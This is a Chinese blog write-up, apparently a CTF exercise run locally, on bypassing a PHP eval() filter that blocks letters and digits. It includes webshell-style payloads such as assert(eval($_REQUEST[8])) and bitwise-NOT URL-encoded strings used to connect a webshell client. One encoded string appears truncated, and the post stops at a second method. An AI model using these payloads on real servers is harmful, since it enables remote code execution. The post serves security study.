捞到代码,在本地搭建,源码(rce.php):
<?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); } if(preg_match("/[A-Za-z0-9]+/",$code)){ die("NO."); } @eval($code); } else{ highlight_file(__FILE__); }
?>
在研究bypass之前,先研究一个问题:eval(变量)
test.php:
<?php $a=$_REQUEST[8]; @eval(8); ?>
想通过传参让页面输出phpinfo的界面,第一种方法就是?8=phpinfo(); ps:记得加分号
我尝试了以下?8=$_REQUEST[6];&6=phpinfo() 是不行的,在网上看过一篇WP说eval是PHP的语法组成的一员,所以eval()括号里一定是一个php预定义语法,不能直接是一个变量,说明eval(变量)的时候,变量不能直接写$_REQUEST[8]
而是要写成菜刀流量的形式:
?8=assert(eval($_REQUEST[8]))&8=phpinfo(); ?8=assert(eval(phpinfo();))
assert()执行单行代码,eval()就是单行代码,经测试payload这样写是可行的。
继续看bypass问题:
法一:取反绕过:
<?php echo urlencode(~'assert'); echo urlencode(~'eval($_REQUEST[8])');?>
结果:
%9E%8C%8C%9A%8D%8B
%9A%89%9E%93%D7%DB%A0%AD%BA%AE%AA%BA%AC%AB%A4%C7%A2%D
试了一下,连接蚁剑是可以的,但是我的蚁剑访问不了远程仓库不知道是什么情况。
法2:异或绕过
原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/273240.html